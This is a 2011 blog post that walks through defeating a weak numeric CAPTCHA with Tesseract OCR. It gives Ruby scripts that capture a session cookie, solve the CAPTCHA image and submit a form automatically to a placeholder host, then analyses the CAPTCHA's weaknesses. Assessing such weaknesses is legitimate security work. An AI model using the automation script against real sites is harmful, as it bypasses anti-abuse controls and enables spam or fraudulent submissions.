Saturday, March 19, 2011

Breaking A Weak CAPTCHA implementation

A while back I came across a web application that implemented captcha to prevent automated form entries. The captcha was weak and could be easily solved. Below I summarize the steps followed and provide sample ruby scripts that were used to perform automated form submissions. The page names, form fields etc... are fictitious and do not reflect the exact application data/behavior.


So lets get started. Here is one sample captcha obtained from the website.




My first thought was to try the free "OCR to text" conversion service provided by guys at Free-Ocr. I uploaded few captchas to the website and it could successfully solve almost all of them. One solved capcha is shown below.




Now I knew that the CAPTCHA can be solved, and needed a way to automate the process of solving the captcha. I turned to Tesseract to do that for me. Tesseact enjoys the reputation of being one of the most accurate open source OCR engines available.


Tesseact was downloaded and installed on a windows box. The page requiring captcha input was sourcing captcha's from a php script on the web server. Lets say its path is http://www.test.com/get_captcha.php. The following script helped download a sample captcha, stored it on local file system and then solved it. 


require 'net/http'
tesseract = 'C:\Tesseract-OCR\tesseract.exe'
q = Net::HTTP.new('www.test.com',80)
# Download new captcha
r = q.get("/get_captcha.php")
File.open("captcha.bmp",'wb') do |f|
f.puts r.body
end
# Solve the CAPTCHA
system("#{tesseract} captcha.bmp captcha") #Output gets stored in captcha.txt

Most of the sourced captchas could be successfully solved using the script above. Good! 

The next obvious step was to automate the entire process of form submissions. The application used PHPSESSIONID to associate captchas with sessions. http://www.test.com/home.php was issuing the PHPSESSIONID and the same sesssion value was being sent to /get_captcha.php to retrieve a captcha. To automated the process, following was required:
  1. GET /home.php page and capture the value of PHPSESSIONID.
  2. Retrieve a captcha by accessing /get_captcha.php while using the captured PHPSESSIONID.
  3. Solve the captcha locally
  4. POST the form fields along with PHPSESSIONID and the captcha value
A few more lines to the script above would serve our purpose. The final script looked like below:


require 'net/http'
tesseract = 'C:\Tesseract-OCR\tesseract.exe'
q = Net::HTTP.new('www.test.com',80)
r = q.get("/home.php")
r['set-cookie'] =~ /PHPSESSIONID=(.*?);/
hdr = {'Cookie' => "PHPSESSIONID=#{$1}"}
#get a captcha associated with a valid PHPSESSIONID and solve it
r = q.get("/get_captcha.php",hdr)
File.open("captcha.bmp",'wb') do |f|
f.puts r.body
end
system("#{tesseract} captcha.bmp captcha")
#retrive the captcha value and POST the form details along with valid PHPSESSIONID
captcha = File.read("captcha.txt").strip
q.post('/save_details.php', "fname=gursev&lname=kalra&captcha=#{captcha}" , hdr)



Further Analysis:
The captcha implementation appeared to have more issues. During the analysis around 100 captchas were solved and their values analyzed. Here are the the various observations:
  1. Captchas contained only numerals and hence lesser number of possible combinations.
  2. Out of 100 captchas around 4 duplicate captchas were identified. Thats around 4% of total captchas issued.
  3. Captchas had uneven character distribution with 4's and 5's getting the maximum share of captcha characters. The distribution formed a bell curve with a peak at 4 and 5.